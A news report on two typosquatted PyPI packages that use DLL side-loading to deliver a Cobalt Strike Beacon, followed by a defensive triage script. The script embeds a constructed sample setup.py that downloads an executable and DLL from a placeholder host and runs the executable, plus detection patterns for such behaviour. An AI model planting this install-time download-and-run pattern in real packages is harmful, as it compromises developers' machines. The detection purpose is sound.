Cybersecurity researchers have found two malicious packages on the Python Package Index (PyPI) repository that were observed leveraging a technique known as DLL side-loading to evade detection by security software and run malicious code.
The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times, respectively, before they were taken down.
"The latest discovery is an example of DLL sideloading executed by an open-source package that suggests the scope of software supply chain threats is expanding," ReversingLabs researcher Petar Kirhmajer said in a report shared with The Hacker News.
The name NP6 is notable because it refers to a legitimate marketing automation solution made by ChapsVision. Specifically, the fake packages are typosquats of NP6HelperHttp and NP6HelperConfig, which are helper tools published to PyPI by one of ChapsVision's employees.
In other words, the goal is to trick developers looking for NP6HelperHttp and NP6HelperConfig into downloading their rogue counterparts.
Contained within the two libraries is a setup.py script that is designed to download two files: a genuine executable from Beijing-based Kingsoft Corporation ("ComServer.exe") that is vulnerable to DLL side-loading, and the malicious DLL to be side-loaded ("dgdeskband64.dll").
By side-loading the DLL, the goal is to avoid detection of the malicious code, as observed previously in the case of an npm package called aabquerys that also leveraged the same technique to execute code capable of deploying a remote access trojan.
The DLL, for its part, reaches out to an attacker-controlled domain ("us.archive-ubuntu[.]top") to fetch a GIF file that, in reality, is a piece of shellcode for a Cobalt Strike Beacon, a post-exploitation toolkit used for red teaming.
There is evidence to suggest that the packages are part of a wider campaign that involves the distribution of similar executables that are susceptible to DLL side-loading.
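The two warning signs described above, a package name that sits a few characters away from a legitimate one and a setup.py that fetches and stages Windows binaries at install time, can both be checked mechanically before a package is approved for use. The following triage script is an added example and is not code from the article, ReversingLabs, or ChapsVision. The legitimate and typosquatted package names are the ones the article reports; the sample setup.py contents, the `example.invalid` URL, the heuristic patterns and the `triage` function are constructed for the demonstration.

```python
"""Added example (not from the article): triage a PyPI package for the two
warning signs the report describes, a typosquatted name and a setup.py that
downloads and stages Windows executables/DLLs during installation."""
import re

# Legitimate names as reported in the article; the threshold is an assumption.
LEGITIMATE_PACKAGES = ["NP6HelperHttp", "NP6HelperConfig"]
MAX_EDIT_DISTANCE = 4

# Constructed stand-in for the install-time behaviour the report describes.
# The URL is a placeholder; nothing here is fetched or run by this script.
SAMPLE_SETUP_PY = r'''
from setuptools import setup
import urllib.request, os, subprocess
BASE = "https://example.invalid/payloads/"   # constructed placeholder
for name in ("ComServer.exe", "dgdeskband64.dll"):
    urllib.request.urlretrieve(BASE + name, os.path.join(os.getcwd(), name))
subprocess.Popen(os.path.join(os.getcwd(), "ComServer.exe"))
setup(name="NP6HelperHttper", version="1.0")
'''

# Constructed benign setup.py used to show the heuristics do not fire on it.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="NP6HelperHttp", version="1.0", install_requires=["requests"])
'''

# Heuristic source patterns (assumptions): install-time network fetch,
# Windows binary filenames, and process spawning from setup.py.
PATTERNS = {
    "network-fetch": re.compile(r"urlretrieve\(|urlopen\(|requests\.get\("),
    "windows-binary": re.compile(r"['\"][^'\"]*\.(?:exe|dll)['\"]", re.I),
    "spawns-process": re.compile(r"subprocess\.|os\.system\(|os\.startfile\("),
}


def normalize(name: str) -> str:
    """PEP 503 style normalization: case-insensitive, [-_.] runs become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, legit=LEGITIMATE_PACKAGES, max_distance=MAX_EDIT_DISTANCE):
    """Legitimate names that `name` resembles closely but does not equal."""
    n = normalize(name)
    return [
        l for l in legit
        if 0 < levenshtein(n, normalize(l)) <= max_distance
    ]


def setup_py_findings(source: str):
    """Names of the heuristic patterns present in a setup.py source text."""
    return [label for label, rx in PATTERNS.items() if rx.search(source)]


def triage(name: str, setup_source: str) -> dict:
    """Combine both checks; a fetch that stages a .exe/.dll is treated as
    suspicious on its own, as is a near-miss on a known package name."""
    squats = typosquat_candidates(name)
    findings = setup_py_findings(setup_source)
    stages_binary = "network-fetch" in findings and "windows-binary" in findings
    return {
        "package": name,
        "typosquat_of": squats,
        "findings": findings,
        "suspicious": bool(squats) or stages_binary,
    }


if __name__ == "__main__":
    for pkg, src in (("NP6HelperHttper", SAMPLE_SETUP_PY),
                     ("NP6HelperHttptest", SAMPLE_SETUP_PY),
                     ("NP6HelperHttp", BENIGN_SETUP_PY)):
        print(triage(pkg, src))
```

The script never executes the setup.py it inspects; it only pattern-matches the source text, which is what makes it safe to run over untrusted sdists in a review pipeline. Edit distance is deliberately crude: the second typosquat differs from the real name by a four-character suffix, so a tighter threshold would miss it, and a production check would pair this with the package's publisher identity and first-seen date.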
"Development organizations need to be aware of the threats related to supply chain security and open-source package repositories," security researcher Karlo Zanki said.
"Even if they are not using open-source package repositories, that doesn't mean that threat actors won't abuse them to impersonate companies and their software products and tools."